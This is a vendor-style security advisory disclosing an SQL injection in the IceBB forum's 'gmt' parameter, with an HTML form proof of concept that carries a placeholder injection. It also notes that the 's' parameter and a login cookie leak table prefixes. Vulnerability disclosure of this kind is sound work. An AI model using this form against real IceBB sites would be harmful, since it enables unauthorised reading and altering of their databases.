Advisory Details:

High-Tech Bridge SA Security Research Lab has discovered vulnerability in IceBB which could be exploited to perform SQL injection attacks.

1) The vulnerability exists due to input sanitation errors in the "gmt" parameter in index.php. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary SQL commands in application`s database. Successful exploitation may allow an attacker to read, modify, add or delete arbitrary data in the database.
Exploitation example:
<form action="http://[host]/index.php" method="post" >
<input type="hidden" name="act" value="login" />
<input type="hidden" name="func" value="Register" />
<input type="hidden" name="terms" value="1" />
<input type="hidden" name="user" value="pentest" />
<input type="hidden" name="pass" value="pentest" />
<input type="hidden" name="pass2" value="pentest" />
<input type="hidden" name="email" value="pentest@htbridge.ch" />
<input type="hidden" name="captcha_code" value="[captcha_code]" />
<input type="hidden" name="captcha_word" value="[captcha_word]" />
<input type="hidden" name="gmt" value="'SQL_CODE_HERE" />
<input type="submit" value="Register" name="submit" />
</form>

Several weaknesses have also been discovered in IceBB while handling incorrect input in the "s" parameter and "icebb_login_key" cookie within the index.php script. A remote attacker can gain knowledge of the table prefixes in the database and use them to successfully exploit this vulnerability.
